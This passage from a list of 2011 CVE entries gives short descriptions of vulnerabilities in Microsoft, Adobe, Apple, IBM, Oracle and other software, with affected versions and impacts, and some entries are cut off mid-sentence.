"Drag and Drop Memory Corruption Vulnerability." [CVE-2011-1253] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5.1, and 4, and Silverlight 4 before 4.0.60831, does not properly restrict inheritance, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, (3) a crafted .NET Framework application, or (4) a crafted Silverlight application, aka ".NET Framework Class Inheritance Vulnerability." [CVE-2011-1251] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "DOM Manipulation Memory Corruption Vulnerability." [CVE-2011-1250] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Link Properties Handling Memory Corruption Vulnerability." [CVE-2011-1246] Microsoft Internet Explorer 8 does not properly handle content settings in HTTP responses, which allows remote web servers to obtain sensitive information from a different (1) domain or (2) zone via a crafted response, aka "MIME Sniffing Information Disclosure Vulnerability." [CVE-2011-1245] Microsoft Internet Explorer 6 and 7 does not properly restrict script access to content from a (1) different domain or (2) different zone, which allows remote attackers to obtain sensitive information via a crafted web site, aka "Javascript Information Disclosure Vulnerability." [CVE-2011-1244] Microsoft Internet Explorer 6, 7, and 8 does not enforce intended domain restrictions on content access, which allows remote attackers to obtain sensitive information or conduct clickjacking attacks via a crafted web site, aka "Frame Tag Information Disclosure Vulnerability." [CVE-2011-1223] Buffer overflow in the Alternate Data Stream (aka ADS or named stream) functionality in the backup-archive client in IBM Tivoli Storage Manager (TSM) before 5.4.3.4, 5.5.x before 5.5.3, 6.x before 6.1.4, and 6.2.x before 6.2.2 on Windows allows local users to gain privileges via unspecified vectors. [CVE-2011-1222] Buffer overflow in the Journal Based Backup (JBB) feature in the backup-archive client in IBM Tivoli Storage Manager (TSM) before 5.4.3.4, 5.5.x before 5.5.3, 6.x before 6.1.4, and 6.2.x before 6.2.2 on Windows and AIX allows local users to gain privileges via unspecified vectors. [CVE-2011-1215] Stack-based buffer overflow in mw8sr.dll in Autonomy KeyView, as used in IBM Lotus Notes before 8.5.2 FP3, allows remote attackers to execute arbitrary code via a crafted link in a Microsoft Office document attachment, aka SPR PRAD8823ND. [CVE-2011-1103] The WebReporting module in F-Secure Policy Manager 7.x, 8.00 before hotfix 2, 8.1x before hotfix 3 on Windows and hotfix 2 on Linux, and 9.00 before hotfix 4 on Windows and hotfix 2 on Linux, allows remote attackers to obtain sensitive information via a request to an invalid report, which reveals the installation path in an error message, as demonstrated with requests to (1) report/infection-table.html or (2) report/productsummary-table.html. [CVE-2011-1102] Cross-site scripting (XSS) vulnerability in the WebReporting module in F-Secure Policy Manager 7.x, 8.00 before hotfix 2, 8.1x before hotfix 3 on Windows and hotfix 2 on Linux, and 9.00 before hotfix 4 on Windows and hotfix 2 on Linux, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1056] The installer for Metasploit Framework 3.5.1, when running on Windows, uses weak inherited permissions for the Metasploit installation directory, which allows local users to gain privileges by replacing critical files with a Trojan horse. [CVE-2011-1003] Double free vulnerability in the vba_read_project_strings function in vba_extract.c in libclamav in ClamAV before 0.97 might allow remote attackers to execute arbitrary code via crafted Visual Basic for Applications (VBA) data in a Microsoft Office document. NOTE: some of these details are obtained from third party information. [CVE-2011-0980] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly parse Office Art objects, which allows remote attackers to execute arbitrary code via vectors related to a function pointer, aka "Excel Dangling Pointer Vulnerability." [CVE-2011-0979] Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-0978] Stack-based buffer overflow in Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-0977] Use-after-free vulnerability in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via malformed shape data in the Office drawing file format, aka "Microsoft Office Graphic Object Dereferencing Vulnerability." [CVE-2011-0976] Microsoft PowerPoint 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-0890] HP Discovery & Dependency Mapping Inventory (DDMI) 7.50, 7.51, 7.60, 7.61, 7.70, and 9.30 launches the Windows SNMP service with its default configuration, which allows remote attackers to obtain potentially sensitive information or have unspecified other impact by leveraging the public read community. [CVE-2011-0866] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Java Runtime Environment. [CVE-2011-0817] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment. [CVE-2011-0806] Unspecified vulnerability in the Network Foundation component in Oracle Database Server 10.1.0.5, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.1, and 11.2.0.2, when running on Windows, allows remote attackers to affect availability via unknown vectors. [CVE-2011-0788] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2011-0786. [CVE-2011-0786] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2011-0788. [CVE-2011-0770] Cross-site scripting (XSS) vulnerability in Windows Event Log SmartConnector in HP ArcSight Connector Appliance before 6.1 allows remote attackers to inject arbitrary web script or HTML via the Windows XP variable in a file. [CVE-2011-0757] IBM DB2 9.1 before FP10, 9.5 before FP6a, and 9.7 before FP2 on Linux, UNIX, and Windows does not properly revoke the DBADM authority, which allows remote authenticated users to execute non-DDL statements by leveraging previous possession of this authority. [CVE-2011-0754] The SplFileInfo::getType function in the Standard PHP Library (SPL) extension in PHP before 5.3.4 on Windows does not properly detect symbolic links, which might make it easier for local users to conduct symlink attacks by leveraging cross-platform differences in the stat structure, related to lack of a FILE_ATTRIBUTE_REPARSE_POINT check. [CVE-2011-0731] Buffer overflow in the DB2 Administration Server (DAS) component in IBM DB2 9.1 before FP10, 9.5 before FP7, and 9.7 before FP3 on Linux, UNIX, and Windows allows remote attackers to execute arbitrary code via unspecified vectors. [CVE-2011-0698] Directory traversal vulnerability in Django 1.1.x before 1.1.4 and 1.2.x before 1.2.5 on Windows might allow remote attackers to read or execute files via a / (slash) character in a key in a session cookie, related to session replays. [CVE-2011-0664] Microsoft .NET Framework 2.0 SP1 and SP2, 3.5 Gold and SP1, 3.5.1, and 4.0, and Silverlight 4 before 4.0.60531.0, does not properly validate arguments to unspecified networking API functions, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, (3) a crafted .NET Framework application, or (4) a crafted Silverlight application, aka ".NET Framework Array Offset Vulnerability." [CVE-2011-0663] Multiple integer overflows in the Microsoft (1) JScript 5.6 through 5.8 and (2) VBScript 5.6 through 5.8 scripting engines allow remote attackers to execute arbitrary code via a crafted web page, aka "Scripting Memory Reallocation Vulnerability." [CVE-2011-0656] Microsoft PowerPoint 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-0655] Microsoft PowerPoint 2007 SP2 and 2010 [CVE-2011-0653] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2010 Gold and SP1, and SharePoint Foundation 2010, allows remote attackers to inject arbitrary web script or HTML via the URI, aka "XSS in SharePoint Calendar Vulnerability." [CVE-2011-0647] The irccd.exe service in EMC Replication Manager Client before 5.3 and NetWorker Module for Microsoft Applications 2.1.x and 2.2.x allows remote attackers to execute arbitrary commands via the RunProgram function to TCP port 6542. [CVE-2011-0628] Integer overflow in Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows remote attackers to execute arbitrary code via ActionScript that improperly handles a long array object. [CVE-2011-0626] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code via unspecified vectors, related to a "bounds checking" issue, a different vulnerability than CVE-2011-0623, CVE-2011-0624, and CVE-2011-0625. [CVE-2011-0625] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code via unspecified vectors, related to a "bounds checking" issue, a different vulnerability than CVE-2011-0623, CVE-2011-0624, and CVE-2011-0626. [CVE-2011-0624] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code via unspecified vectors, related to a "bounds checking" issue, a different vulnerability than CVE-2011-0623, CVE-2011-0625, and CVE-2011-0626. [CVE-2011-0623] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code via unspecified vectors, related to a "bounds checking" issue, a different vulnerability than CVE-2011-0624, CVE-2011-0625, and CVE-2011-0626. [CVE-2011-0622] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0619, CVE-2011-0620, and CVE-2011-0621. [CVE-2011-0621] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0619, CVE-2011-0620, and CVE-2011-0622. [CVE-2011-0620] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0619, CVE-2011-0621, and CVE-2011-0622. [CVE-2011-0619] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0620, CVE-2011-0621, and CVE-2011-0622. [CVE-2011-0618] Integer overflow in Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code via unspecified vectors. [CVE-2011-0611] Adobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and Solaris and 10.2.156.12 and earlier on Android [CVE-2011-0610] The CoolType library in Adobe Reader 9.x before 9.4.4 and 10.x through 10.0.1 on Windows, Adobe Reader 9.x before 9.4.4 and 10.x before 10.0.3 on Mac OS X, and Adobe Acrobat 9.x before 9.4.4 and 10.x before 10.0.3 on Windows and Mac OS X allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. [CVE-2011-0609] Unspecified vulnerability in Adobe Flash Player 10.2.154.13 and earlier on Windows, Mac OS X, Linux, and Solaris [CVE-2011-0606] Stack-based buffer overflow in rt3d.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors related to a crafted length value, a different vulnerability than CVE-2011-0563 and CVE-2011-0589. [CVE-2011-0604] Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-0587. [CVE-2011-0603] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image, a different vulnerability than CVE-2011-0566 and CVE-2011-0567. [CVE-2011-0602] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via crafted JP2K record types in a JPEG2000 image in a PDF file, which causes heap corruption, a different vulnerability than CVE-2011-0596, CVE-2011-0598, and CVE-2011-0599. [CVE-2011-0600] The U3D component in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a 3D file with an invalid Parent Node count that triggers an incorrect size calculation and memory corruption, a different vulnerability than CVE-2011-0590, CVE-2011-0591, CVE-2011-0592, CVE-2011-0593, and CVE-2011-0595. [CVE-2011-0599] The Bitmap parsing component in rt3d.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted image that causes an invalid pointer calculation related to 4/8-bit RLE compression, a different vulnerability than CVE-2011-0596, CVE-2011-0598, and CVE-2011-0602. [CVE-2011-0598] Integer overflow in ACE.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to execute arbitrary code via crafted ICC data, a different vulnerability than CVE-2011-0596, CVE-2011-0599, and CVE-2011-0602. [CVE-2011-0596] The Bitmap parsing component in 2d.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via an image with crafted (1) height and (2) width values for an RLE_8 compressed bitmap, which triggers a heap-based buffer overflow, a different vulnerability than CVE-2011-0598, CVE-2011-0599, and CVE-2011-0602. [CVE-2011-0595] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, a different vulnerability than CVE-2011-0590, CVE-2011-0591, CVE-2011-0592, CVE-2011-0593, and CVE-2011-0600. [CVE-2011-0594] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a font. [CVE-2011-0593] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, a different vulnerability than CVE-2011-0590, CVE-2011-0591, CVE-2011-0592, CVE-2011-0595, and CVE-2011-0600. [CVE-2011-0592] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, related to "Texture bmp," a different vulnerability than CVE-2011-0590, CVE-2011-0591, CVE-2011-0593, CVE-2011-0595, and CVE-2011-0600. [CVE-2011-0591] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, related to Texture and rgba, a different vulnerability than CVE-2011-0590, CVE-2011-0592, CVE-2011-0593, CVE-2011-0595, and CVE-2011-0600. [CVE-2011-0590] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a 3D file, a different vulnerability than CVE-2011-0591, CVE-2011-0592, CVE-2011-0593, CVE-2011-0595, and CVE-2011-0600. [CVE-2011-0589] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0563 and CVE-2011-0606. [CVE-2011-0588] Untrusted search path vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory, a different vulnerability than CVE-2011-0562 and CVE-2011-0570. [CVE-2011-0587] Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-0604. [CVE-2011-0586] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X do not properly validate unspecified input data, which allows attackers to execute arbitrary code via unknown vectors. [CVE-2011-0585] Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0565. [CVE-2011-0579] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to obtain sensitive information via unspecified vectors. [CVE-2011-0570] Untrusted search path vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory, a different vulnerability than CVE-2011-0562 and CVE-2011-0588. [CVE-2011-0567] AcroRd32.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image that triggers an incorrect pointer calculation, leading to heap memory corruption, a different vulnerability than CVE-2011-0566 and CVE-2011-0603. [CVE-2011-0566] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image, a different vulnerability than CVE-2011-0567 and CVE-2011-0603. [CVE-2011-0565] Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0585. [CVE-2011-0564] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows use weak permissions for unspecified files, which allows attackers to gain privileges via unknown vectors. [CVE-2011-0563] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0589 and CVE-2011-0606. [CVE-2011-0562] Untrusted search path vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory, a different vulnerability than CVE-2011-0570 and CVE-2011-0588. [CVE-2011-0537] Multiple directory traversal vulnerabilities in (1) languages/Language.php and (2) includes/StubObject.php in MediaWiki 1.8.0 and other versions before 1.16.2, when running on Windows and possibly Novell Netware, allow remote attackers to include and execute arbitrary local PHP files via vectors related to a crafted language file and the Language::factory function. [CVE-2011-0450] The downloads manager in Opera before 11.01 on Windows does not properly determine the pathname of the filesystem-viewing application, which allows user-assisted remote attackers to execute arbitrary code via a crafted web site that hosts an executable file. [CVE-2011-0346] Use-after-free vulnerability in the ReleaseInterface function in MSHTML.DLL in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the DOM implementation and the BreakAASpecial and BreakCircularMemoryReferences functions, as demonstrated by cross_fuzz, aka "MSHTML Memory Corruption Vulnerability." [CVE-2011-0290] The BlackBerry Collaboration Service in Research In Motion (RIM) BlackBerry Enterprise Server (BES) 5.0.3 through MR4 for Microsoft Exchange and Lotus Domino allows remote authenticated users to log into arbitrary user accounts associated with the same organization, and send messages, read messages, read contact lists, or cause a denial of service (login unavailability), via unspecified vectors. [CVE-2011-0258] Apple QuickTime before 7.7 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted image description associated with an mp4v tag in a movie file. [CVE-2011-0248] Stack-based buffer overflow in the QuickTime ActiveX control in Apple QuickTime before 7.7 on Windows, when Internet Explorer is used, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted QTL file. [CVE-2011-0247] Multiple stack-based buffer overflows in Apple QuickTime before 7.7 on Windows allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted H.264 movie. [CVE-2011-0246] Heap-based buffer overflow in Apple QuickTime before 7.7 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted GIF file. [CVE-2011-0215] ImageIO in Apple Safari before 5.0.6 on Windows does not properly address re-entrancy issues, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TIFF file. [CVE-2011-0214] CFNetwork in Apple Safari before 5.0.6 on Windows does not properly handle an untrusted attribute of a system root certificate, which allows remote web servers to bypass intended SSL restrictions via a certificate signed by a blacklisted certification authority. [CVE-2011-0208] QuickLook in Apple Mac OS X 10.6 before 10.6.8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted Microsoft Office document. [CVE-2011-0192] Buffer overflow in Fax4Decode in LibTIFF 3.9.4 and possibly other versions, as used in ImageIO in Apple iTunes before 10.2 on Windows and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TIFF Internet Fax image file that has been compressed using CCITT Group 4 encoding, related to the EXPAND2D macro in libtiff/tif_fax3.h. NOTE: some of these details are obtained from third party information. [CVE-2011-0191] Buffer overflow in LibTIFF 3.9.4 and possibly other versions, as used in ImageIO in Apple iTunes before 10.2 on Windows and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TIFF image with JPEG encoding. [CVE-2011-0170] Heap-based buffer overflow in ImageIO in CoreGraphics in Apple iTunes before 10.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted International Color Consortium (ICC) profile in a JPEG image. [CVE-2011-0168] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0167] The windows functionality in WebKit in Apple Safari before 5.0.4 allows remote attackers to bypass the Same Origin Policy, and force the upload of arbitrary local files from a client computer, via a crafted web site. [CVE-2011-0165] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0164] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0156] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0155] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0154] WebKit, as used in Apple iTunes before 10.2 on Windows and Apple iOS, does not properly implement the .sort function for JavaScript arrays, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0153] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0152] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0151] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0150] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0149] WebKit, as used in Apple iTunes before 10.2 on Windows, does not properly parse HTML elements associated with document namespaces, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to a "dangling pointer" and iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0148] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0147] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0146] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0145] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0144] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0143] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0142] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0141] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0140] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0139] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0138] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0137] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0136] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0135] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0134] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0133] WebKit, as used in Apple iTunes before 10.2 on Windows, does not properly access glyph data during layout actions for floating blocks associated with pseudo-elements, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0132] Use-after-free 